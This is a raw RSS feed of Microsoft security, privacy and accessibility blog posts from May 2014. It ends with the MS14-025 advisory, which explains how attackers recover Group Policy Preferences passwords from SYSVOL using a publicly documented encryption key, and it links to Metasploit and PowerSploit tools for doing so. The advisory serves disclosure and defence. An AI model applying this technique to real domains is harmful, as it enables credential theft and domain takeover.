width="1" height="1">Announcements Learn How to Test Apps for Accessibility on the Windows App Builders Bloghttp://blogs.msdn.com/b/accessibility/archive/2014/05/27/learn-how-to-test-apps-for-accessibility-on-the-windows-app-builders-blog.aspxTue, 27 May 2014 22:10:58 GMT91d46819-8472-40ad-a661-2c78acb4018c:10528880Daniel Hubbell - MSFT2http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10528880http://blogs.msdn.com/b/accessibility/archive/2014/05/27/learn-how-to-test-apps-for-accessibility-on-the-windows-app-builders-blog.aspx#commentsWhen developers design apps that are accessible everyone can benefit. Over on the Windows App Builders Blog, a new story explains how developers can test the accessibility of their apps and check for key features, such as clearly visible text. Whether...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/27/learn-how-to-test-apps-for-accessibility-on-the-windows-app-builders-blog.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10528880" width="1" height="1"> Is your child graduating to a new digital device?http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/27/is-your-child-graduating-to-a-new-digital-device.aspxTue, 27 May 2014 15:04:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10527801Eve Blakemore1http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10527801http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/27/is-your-child-graduating-to-a-new-digital-device.aspx#comments<p>Its graduation time, and smartphones, tablets, gaming consoles, and laptops are tops on many kids&rsquo; wish lists. Whether your child is graduating from preschool or college, it&rsquo;s never too late to talk with them about online safety before you hand over the new device.</p> <ul> <li>Set clear rules for young children about who they can talk to, text, or play games with.</li> <li>With older kids, discuss online bullying, sexting, and the dangers of using a phone while driving.</li> <li>Have kids lock all devices and accounts with a PIN or strong password, and remind them to keep their passwords secret&mdash;even from best friends.</li> <li>Talk to kids about limiting the personal information they share to close friends only.</li> <li>Consider disabling the location services on your young child&rsquo;s devices; at the very least, turn it off for any camera.</li> <li>Teach tweens and teens to use location-based services cautiously.</li> </ul> <p>For more guidelines on kids and online safety, see <a href="http://www.microsoft.com/security/family-safety/gift-checklist.aspx">Digital gift-giving checklist</a>, and <a href="http://go.microsoft.com/?linkid=9842695">download a printable version of the checklist</a>&nbsp;(PDF, 186 KB).</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10527801" width="1" height="1">child safetyfamilypasswordsWindows Phonegraduationsmartphonelocation servicesonline bullyingPINtabletcollegegaming consoletexting while driving SAFECode on Confidence: One Size Does Not Fit Allhttp://blogs.msdn.com/b/sdl/archive/2014/05/23/safecode-one-size-does-not-fit-all.aspxFri, 23 May 2014 22:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10528139SDL Team0http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10528139http://blogs.msdn.com/b/sdl/archive/2014/05/23/safecode-one-size-does-not-fit-all.aspx#comments<p>In a recent post by SAFECode, a non-profit organization of software vendors dedicated to increasing trust in information and communications technology products by improving security and assurance methods, Eric Baize of EMC and Steve Lipner of Microsoft discuss the challenging subject of trustworthiness of acquired software.&nbsp; How a customer gains confidence in acquired software is a frequently asked question of developers.&nbsp; The latest SAFECode blog discusses three approaches that a customer can use to assess the security of acquired software with varying levels of confidence.</p> <p><a href="http://blog.safecode.org/?p=240">http://blog.safecode.org/?p=240</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10528139" width="1" height="1"> The Role of Big Data in Increasing Security and Resilience to Catastrophic Eventshttp://blogs.technet.com/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspxFri, 23 May 2014 17:35:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a0fb59ec-955a-40f9-8975-aca2f84552d6Paul Nicholas - TwC0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3631331http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3631331http://blogs.technet.com/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx#comments<p>Technology is changing the world around us, and creating new opportunities to solve old problems. The number of Internet users, and the devices they connect to the Internet, will continue to grow rapidly in the next decade.&nbsp; The Internet of Things will take root in our everyday lives, and create new and powerful data streams.</p> <p>This &ldquo;big data&rdquo; has the potential to be of tremendous value in many aspects of business and everyday life.&nbsp; One potential benefit can be helping to mitigate catastrophic events by enhancing preparedness, reducing the impact of catastrophic events, increasing the efficiency of humanitarian response, and enabling the more rapid recovery of business and livelihoods.</p> <p>Over the past few years Microsoft has looked at how we could use our passion for innovative technology to make a difference in people&#39;s everyday lives, so supporting <a href="http://www.bing.com/videos?mkt=en-us&amp;vid=096891fa-5170-42c0-a47a-72e48dce5254&amp;from=sharepermalink-link">humanitarian relief and disaster management efforts</a>&nbsp;has become part of our commitment to developing technology solutions, tools, and practices that can foster social and economic change. Whether it is by deploying emergency connectivity kits, enabling communications for aid workers and first responders as we recently did in the Philippines, or developing mapping tools and imagery to enhance response organizations&rsquo; analysis and resource deployment planning, we believe technology can truly make a difference. <a href="/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631331&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Big DataGSSDGlobal Security Strategy &amp; Diplomacy Protecting Data and Privacy in the Cloud: Part 1http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/22/protecting-data-and-privacy-in-the-cloud.aspxThu, 22 May 2014 15:53:14 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:9d128732-f148-4c70-9a82-9a8bbcb19b65Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong><br /><br />For organizations looking to reap the benefits of cloud computing, it is important to know how a service provider is using customer data stored in the cloud and to trust that the service provider will only use their data in a way that is consistent with customer expectations.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/05/21/protecting-data-and-privacy-in-the-cloud.aspx">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/22/protecting-data-and-privacy-in-the-cloud.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631192&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicescloud securityCustomersBrendon LynchCloudTrustBig Dataprivacy and reliabilitycustomer perspectiveCloud Computingcloud servicesTrustworthy ComputingMicrosoftpersonal dataDataPrivacyMicrosoft Cloud Solutions What’s new with Windows Phone 8.1?http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/22/what-s-new-with-windows-phone-8-1.aspxThu, 22 May 2014 15:34:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10527175Eve Blakemore5http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10527175http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/22/what-s-new-with-windows-phone-8-1.aspx#comments<p>Windows Phone 8.1 includes features that let you browse the web and use location awareness apps and other apps without losing control of your privacy and security.</p> <h1>Turn location services on or off</h1> <p>Location services can improve your experience in many different applications, from restaurant finders to social networks. If you don&rsquo;t want to share your location, you can turn location services off.&nbsp;</p> <p><strong>To turn location services on or off</strong></p> <ol> <li>In the&nbsp;<a href="http://www.windowsphone.com/en-US/how-to/wp8/settings-and-personalization/wheres-the-app-list" target="_blank">App list</a>, tap&nbsp;<strong>Settings&nbsp;<a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/4621.settings.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/100x100/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/4621.settings.png" alt="" border="0" /></a></strong>&nbsp; &gt;&nbsp;<strong>Location</strong>.</li> <li>Turn&nbsp;<strong>Location services&nbsp;<img src="http://blogs.msdn.com/resized-image.ashx/__size/100x100/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/6712.location-services.png" alt="" border="0" /></strong>on or off.</li> </ol> <div> <h1>See when an app is accessing your location information</h1> If you want to use location services and also see when an app is accessing your phone&rsquo;s location, you can turn the Location icon&nbsp;<a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/8156.location-icon.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/100x100/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/8156.location-icon.png" alt="" border="0" /></a>. <p><strong>To make sure this icon is turned on</strong></p> <ol start="1"> <li>In the&nbsp;<a href="http://www.windowsphone.com/en-us/how-to/wp8/basics/wheres-the-app-list" target="_blank">App list</a>,&nbsp;tap&nbsp;<strong>Settings&nbsp;<a href="http://blogs.msdn.com/resized-image.ashx/__size/100x100/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/4621.settings.png"><img style="max-height: 100px; max-width: 100px;" src="http://blogs.msdn.com/resized-image.ashx/__size/100x100/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/4621.settings.png" alt="" border="0" /></a></strong>&nbsp;&nbsp;&gt;&nbsp;<strong>Location</strong>.</li> <li>Select the&nbsp;<strong>Show icon</strong>&nbsp;check box.</li> </ol> <p><strong>Note</strong>&nbsp;Choosing not to display the Location icon doesn't turn off location services. It simply hides the icon to reduce clutter on your phone's status bar.</p> <h1>Change privacy settings on your mobile browser</h1> <p>Internet Explorer 11 for Windows Phone makes it easy to adjust settings. You can delete your Internet Explorer search history and use the SmartScreen Filter to help protect against unsafe websites. You can also set Internet Explorer to send a Do Not Track request to websites you visit to signal that you don't want that website to track your browsing.</p> <h1>Privacy settings in Cortana (the new personal assistant for Windows Phone)</h1> <p><a href="http://www.windowsphone.com/en-US/how-to/wp8/apps/meet-cortana">Cortana</a> is the new digital assistant for Windows Phone 8.1 that can help with tasks and offer reminders, suggestions, and more. The more Cortana knows about you, the more efficient she can be.</p> <p><strong>Note:</strong> Cortana is only available on phones with Windows Phone 8.1, and only in <a href="http://windowsphone.com/en-US/how-to/wp8/basics/feature-and-service-availability">some countries/regions</a>. Check to see <a href="http://windowsphone.com/en-US/how-to/wp8/basics/which-version-of-windows-phone-do-i-have">which software version you have</a>.</p> <h1>Settings you can change in Cortana to help control your privacy</h1> <ul> <li>If Cortana is on, you can control detection of tracking info in email messages.</li> <li>Regardless of whether Cortana is on or off, you can choose whether to send your browsing history to Microsoft to help improve our services and products.</li> <li>If Cortana is on, you can control whether Cortana uses information from your Facebook account for personalization.</li> </ul> <p>To understand how Cortana and Bing work with Facebook, see&nbsp;<a href="http://www.windowsphone.com/en-US/how-to/wp8/apps/cortana-and-my-privacy-faq">Cortana and my privacy FAQ</a>.</p> <p>For more information about these and other settings, see <a href="http://www.microsoft.com/security/online-privacy/windows-phone.aspx">Privacy in Windows Phone 8.1</a>.</p> <p>&nbsp;</p> </div><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10527175" width="1" height="1">privacyMicrosoftWindows Phone 8.1mobile browserCortanalocation information Which Countries/Regions Encountered the Most Malware in 2013?http://blogs.technet.com/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspxWed, 21 May 2014 16:01:02 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:7a97c2a0-7955-49c6-913c-a00247fceb14Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3631027http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3631027http://blogs.technet.com/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx#comments<p>Data released this month from the <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report </a>volume 16 (SIRv16) helps us understand which countries/regions encountered the most malware in 2013.</p> <p>The &ldquo;encounter rate&rdquo; is the percentage of computers running Microsoft real-time security software that report detecting malware, or report detecting a specific threat or family, during a period.&nbsp; Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8). The below chart provides a breakdown of the top 10 locations with the highest malware encounter rates.&nbsp;<a href="/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631027&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Cybersecurity ReportTop 10 Countries/Regions Encountering Malware in 2013Microsoft Security Intelligence Report2013 Malware Encounter Rates Accessibility and Technology Take Center Stage at the 2014 Ability Summithttp://blogs.msdn.com/b/accessibility/archive/2014/05/20/accessibility-and-technology-take-center-stage-at-the-2014-ability-summit.aspxTue, 20 May 2014 21:31:22 GMT91d46819-8472-40ad-a661-2c78acb4018c:10527156Daniel Hubbell - MSFT1http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10527156http://blogs.msdn.com/b/accessibility/archive/2014/05/20/accessibility-and-technology-take-center-stage-at-the-2014-ability-summit.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- When Microsoft held its first Ability Summit...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/20/accessibility-and-technology-take-center-stage-at-the-2014-ability-summit.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10527156" width="1" height="1"> Transfer your files to a new computer for freehttp://blogs.msdn.com/b/securitytipstalk/archive/2014/05/20/transfer-your-files-to-a-new-computer-for-free.aspxTue, 20 May 2014 16:10:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10525194Eve Blakemore15http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10525194http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/20/transfer-your-files-to-a-new-computer-for-free.aspx#comments<p>Product support for Windows XP ended in April. Moving forward this means that Windows XP based-systems will not receive security updates.</p> <p><a href="http://amirunningxp.com/">Find out if your computer is running Windows XP</a>. If it is, you might be able to upgrade your computer, or buy a new one.</p> <h1>If you buy a new computer, learn how to move your files, photos, and more for free.</h1> <p>We've worked with Laplink to provide you with free data transfer. Laplink PCmover Express for Windows XP is an easy way to move your files, settings, and user profiles from your old computer running Windows XP to your new PC.</p> <p><a href="http://www.microsoft.com/windows/en-us/xp/transfer-your-data.aspx?ocid=XPEOS_SOC_TW_POST_TUESTIP&amp;amp;linkId=7918786">Download the free version of PCmover Express to get started</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10525194" width="1" height="1">security updatesautomatic updatingAutomatic UpdatessecuritybackupcybersecurityWindows XPWindows 8free data transferback-upLaplink PCmover Express Establishing Trust in Our Data-Centric Worldhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/16/establishing-trust-in-our-data-centric-world.aspxFri, 16 May 2014 22:04:43 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a7779275-406e-4882-9829-83b51b6af5eeTrusted Cloud Team0<p><strong>By Peter Cullen, General Manager, Trustworthy Computing</strong><br /><br />More and more, we are becoming a data-driven society, in which governments and industry have access to increasing volumes of information through consumer interactions online. A recent <a href="http://www.whitehouse.gov/sites/default/files/docs/big_data_privacy_report_may_1_2014.pdf" target="_blank">White House report </a>on &ldquo;Big Data&rdquo; demonstrates the broad recognition of related privacy concerns which, if not managed correctly, may outweigh the benefits we can derive from this wealth of information. <a href="/b/trustworthycomputing/archive/2014/05/15/establishing-trust-in-our-data-centric-world.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/16/establishing-trust-in-our-data-centric-world.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629841&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesTrustBig Dataprivacy and reliabilityCloud Computingcloud servicesTrustworthy ComputingMicrosoftpersonal dataDataPrivacy May 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/05/16/may-2014-security-bulletin-webcast-and-q-amp-a.aspxFri, 16 May 2014 16:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0cd2eccf-58de-46c4-9162-cef1d749796eDustin C. Childs0<p>Today we published the May 2014 Security Bulletin Webcast <a href="http://blogs.technet.com/b/msrc/p/may-2014-security-bulletin-q-a.aspx">Questions &amp; Answers page</a>. We answered 17 questions in total, with the majority focusing on the update for SharePoint (<a href="https://technet.microsoft.com/library/security/ms14-022">MS14-022</a>), Group Policy (<a href="https://technet.microsoft.com/library/security/ms14-025">MS14-025</a>) and Internet Explorer (<a href="https://technet.microsoft.com/library/security/ms14-029">MS14-029</a>).</p> <p>Here is the video replay:</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/LKBwbueqBKM?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/LKBwbueqBKM?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, June 11, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the June bulletin release and answer your bulletin deployment questions live on the air.</p> <p>You can register to attend the webcast at the link below:</p> <p><b>Date: Wednesday, June 11, 2014<br /> Time: 11:00 a.m. PDT (UTC -7)<br /> Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572980&amp;Culture=en-US"><b>Attendee Registration</b></a></p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629889&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastSecurity Bulletin WebcastInternet Explorer (IE)Microsoft Office Cybersecurity Report: Perspectives from Abroad http://blogs.technet.com/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspxThu, 15 May 2014 21:40:14 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8d13cb64-7a38-4320-b705-634f8db5a05bTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3629835http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3629835http://blogs.technet.com/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx#comments<p>Each time we publish our <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report</a>, I have an opportunity to visit a handful of countries/regions to meet with customers, partners and media to share the latest findings.&nbsp; The report is designed to help our customers, partners, and the broader cybersecurity community understand the tools, tactics and threats posed by cybercriminals. This knowledge is essential for Information Technology and security professionals trying to better protect themselves and their organizations from cyber-attacks.</p> <p>But don&rsquo;t take our word for it.&nbsp; Check out this video to hear perspectives on the value it brings from several of the people we had an opportunity to meet with in various parts of the world.&nbsp; <a href="/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629835&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Security Intelligence Report Volume 16Global EventSIRv16 At Globsec 2014, Cybersecurity takes its place on the international stage http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspxThu, 15 May 2014 16:03:34 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b66974a2-9c39-4161-b7fb-f1fc14494c03Paul Nicholas - TwC0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3629736http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3629736http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx#comments<p>Yesterday, I participated in the opening remarks at this year&rsquo;s <a href="http://www.globsec.org/globsec2014/conference">GLOBSEC Bratislava Global Security Forum</a>, one of the largest foreign policy and security conferences in Europe.&nbsp; In my remarks I noted that at this year&rsquo;s conference, much of the online world was included in traditional security topics such as global power shifts, military capabilities, and economic concerns.</p> <p>The increased focus on cybersecurity is not a surprise, as countries today are increasingly dependent on technology for the core functions of their economy, defense, safety, and public healthcare. As a result, governments are under more pressure to develop and maintain capabilities for defense in cyberspace and reduce the risk to critical infrastructure. In the past year, we have seen an unprecedented number of countries, big and small, try to address those concerns by developing national cybersecurity strategies, proposing legislation to try and secure their core assets, and increase their spending in cyber warfare &ndash; for the first time investment in offensive capabilities has been openly talked about. <a href="/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629736&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">GLOBSEC Bratislava Global Security ForumGSSDGlobal Security Strategy &amp; Diplomacy Security Trends in Cloud Computing Part 4: Public sectorhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/15/security-trends-in-cloud-computing-part-4-public-sector.aspxThu, 15 May 2014 15:57:08 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:eb5d877c-3b0f-40f3-99dd-d924d0ef8023Trusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>In the first three posts in this series, we examined data from the <a href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx" target="_blank">financial services</a>, <a href="/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx" target="_blank">healthcare </a>and <a href="/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspx" target="_blank">retail </a>industries, and the potential security benefits that could be derived by adopting cloud computing.&nbsp; Today we&rsquo;ll wrap up the series with a look at cloud security trends in the public sector.&nbsp;&nbsp; <a href="/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-4-public-sector.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/15/security-trends-in-cloud-computing-part-4-public-sector.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629608&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicescloud securityAdrienne HallCloudTrustBig Dataprivacy and reliabilityITTechnologycloud trust studySecurity ResearchSecurityCloud Computingcloud servicesTrustworthy ComputingMicrosoftpersonal dataDataPrivacyMicrosoft Cloud Solutions 5 ways to protect your Microsoft accounthttp://blogs.msdn.com/b/securitytipstalk/archive/2014/05/15/5-ways-to-protect-your-microsoft-account.aspxThu, 15 May 2014 15:54:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522795Eve Blakemore9http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10522795http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/15/5-ways-to-protect-your-microsoft-account.aspx#comments<p>Your <a href="http://windows.microsoft.com/en-us/windows-8/microsoft-account-tutorial">Microsoft account</a> (formerly your Windows Live ID) is the combination of an email address and a password that you use to sign in to services such as Xbox LIVE and Outlook.com, as well as devices such as Windows Phone and computers running Windows 8.</p> <h1>A Microsoft account is free and you can use it to:</h1> <ul> <li>Purchase apps from the Windows Store</li> <li>Back up all your data using free cloud storage</li> <li>Keep all your devices, photos, friends, games, settings, music, up to date and in sync.</li> </ul> <h1>5 ways to help protect your Microsoft account</h1> <ol> <li><a href="https://www.microsoft.com/security/pc-security/password-checker.aspx">Create a strong password</a>. Strong passwords use a combination of uppercase and lowercase letters, numerals, punctuation marks, and symbols. The longer the better, and don&rsquo;t use personal information (such as a pet&rsquo;s name, nickname, or driver&rsquo;s license number) that can be easily guessed.</li> <li><a href="http://www.microsoft.com/security/pc-security/protect-passwords.aspx">Protect your password</a>. Don&rsquo;t use the same password you use on other sites, and remember to change your Microsoft account password (as well as other passwords) regularly. Watch out for email social engineering scams designed to trick you into turning over your password to a cybercriminal.</li> <li><a href="https://account.live.com/proofs/Manage">Enable two-step verification</a>. Two-step verification uses two ways to verify your identity whenever you sign in to your Microsoft account. Two-step verification is optional, but we recommend that you use it. <a href="http://windows.microsoft.com/en-us/windows/two-step-verification-faq">Learn how to turn it on</a>.</li> <li><a href="http://windows.microsoft.com/en-us/windows-live/account-security-password-information">Make sure the security information associated with your account is current</a>. If the alternate email address or phone number you&rsquo;ve given us changes, update the settings of your account so that we can contact you if there&rsquo;s a problem.</li> <li><a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx">Watch out for phishing scams</a>. If you receive an email message about the security of your Microsoft account, it could be a&nbsp;<a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">phishing scam</a>. Don&rsquo;t click links in any messages unless you trust or check with the sender.&nbsp;</li> </ol> <p>Don&rsquo;t have a Microsoft account yet? See <a href="http://windows.microsoft.com/en-us/windows-live/sign-up-create-account-how">How do I sign up for a Microsoft account?</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522795" width="1" height="1">fraudid theftphishinge-mailcybersecuritycybersafetye-mail scamscybercriminalspasswordsemailemail scamsMicrosoftMicrosoft Accounttwo-step verificationWindows Store A Mother with Hearing Loss Is About to Learn about Microsoft’s New Accessibility Tools http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspxThu, 15 May 2014 14:40:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10524717Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10524717http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- Stephanie Radecki has been using Microsoft products...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10524717" width="1" height="1"> MS14-025: An Update for Group Policy Preferenceshttp://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspxTue, 13 May 2014 18:46:06 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:84afb7e4-c4e6-4633-8512-b799d754b2f6SRD Blog Author0<p>Today, we released an update to address a vulnerability in Group Policy Preferences (<a href="http://technet.microsoft.com/security/bulletin/ms14-025">MS14-025</a>). Group Policy Preferences was an addition made to Group Policy to extend its capabilities. Among other things, Group Policy Preferences allows an administrator to configure:</p> <ul> <li>Local administrator accounts (name of the account, account password, etc)</li> <li>Configure a service or scheduled task (allowed to specify alternate credentials to run as)</li> <li>Mount network drives when a user logs in (allowed to specify alternate credentials to connect with)</li> </ul> <p>Group Policy Preferences are distributed just like normal group policy: An XML file containing the settings is written to the SYSVOL share of the domain controllers, and computers periodically query the SYSVOL share (authenticating to it using their computer account) for updates to the group policy.</p> <p>Several of the Group Policy Preferences allow credentials to be specified. When this option is used, the password is symmetrically encrypted using a static key and written to the XML file along with the rest of the settings. What is this key you ask? It turns out, we document it on MSDN: <a href="http://msdn.microsoft.com/en-us/library/cc422924.aspx">http://msdn.microsoft.com/en-us/library/cc422924.aspx</a>.</p> <p>If an attacker is able to get access to the SYSVOL share (which is open to all authenticated users, so a malicious or spear phished employee will have access to it) and obtain the AES encryption key used to encrypt/decrypt passwords set with GPP (which we document on MSDN), the attacker will be able to obtain the credentials set with GPP.</p> <p>Microsoft has observed that Group Policy Preferences abuse is one of the most common tactics used by attackers to elevate permissions in a domain. Multiple toolkits used by attackers such as Metasploit (<a href="http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp">http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp</a>) and PowerSploit (<a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1</a>) provide easy to use methods for retrieving and decrypting GPP passwords. In the worst case scenario, companies use Domain Administrator credentials in their Group Policy Preference accounts, resulting in a full domain compromise as soon as the attacker is able to access with SYSVOL share (and decrypt the passwords using the documented key).</p> <p>Microsoft has released an update to change the behavior for this issue, but companies using GPP need to take action. Microsoft has removed the ability to create or modify any Group Policy which contains a Group Policy Preference that specifies account credentials. The only action that can be performed on such a Group Policy is &ldquo;delete&rdquo;. Note that Microsoft is not automatically disabling these Group Policies because we do not want to disrupt existing environments which rely on this feature. You can see in the picture below that when attempting to create a local account the &ldquo;username&rdquo; and &ldquo;password&rdquo; fields are disabled. If you attempt to create a user, an error dialog will be displayed.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/gpp.png"><img alt=" " 